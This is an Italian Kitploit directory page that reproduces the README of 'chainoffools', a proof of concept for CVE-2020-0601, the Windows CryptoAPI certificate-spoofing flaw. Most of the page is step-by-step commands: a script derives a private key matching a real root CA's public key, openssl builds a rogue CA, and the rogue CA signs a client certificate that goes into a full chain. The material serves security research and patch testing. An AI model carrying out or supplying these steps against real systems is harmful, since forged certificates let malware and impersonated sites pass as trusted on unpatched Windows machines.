Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
chainoffools — Una PoC per CVE-2020-0601 | Kitploit
Strumenti/GitHubGitHub/kudelskisecurity/chainoffools
Analisi delle VulnerabilitàAnalisi del CodiceExploitCrittografiaPenetration Testing
GitHubkudelskisecurity/chainoffools

chainoffools

Una PoC per CVE-2020-0601

Vedi Repository
335813 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CryptoAPI

CVE-2020-0601: sfruttamento della vulnerabilità di spoofing di CryptoAPI di Windows. Maggiori informazioni nel nostro post del blog.

Installazione dei requisiti

root@kitploit:~
pip install -U -r requirements.txt

La generazione dei certificati funziona con OpenSSL fino alla versione 1.0.2u.

Certificato CA

Abbiamo usato la USERTrust ECC Certification Authority ma può essere qualsiasi certificato radice che funziona con la curva P-384.

Per generare una chiave privata che corrisponda alla chiave pubblica del certificato radice abbiamo usato lo script gen-key.py (funziona con Python 3.6 e versioni successive):

root@kitploit:~
$ ./gen-key.py RootCert.pem 

La chiave può essere visualizzata con:

root@kitploit:~
$ openssl ec -in p384-key-rogue.pem -text

Quindi per generare la CA rogue:

root@kitploit:~
$ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -config ca.cnf -days 500

Quindi generiamo la seguente chiave privata e certificato:

root@kitploit:~
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem

openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr

openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf 

Infine, per avere la catena completa in un unico file, concateniamo i certificati CA e del server:

root@kitploit:~
cat client-cert.pem ca-rogue.pem > cert.pem
Scarica lo strumento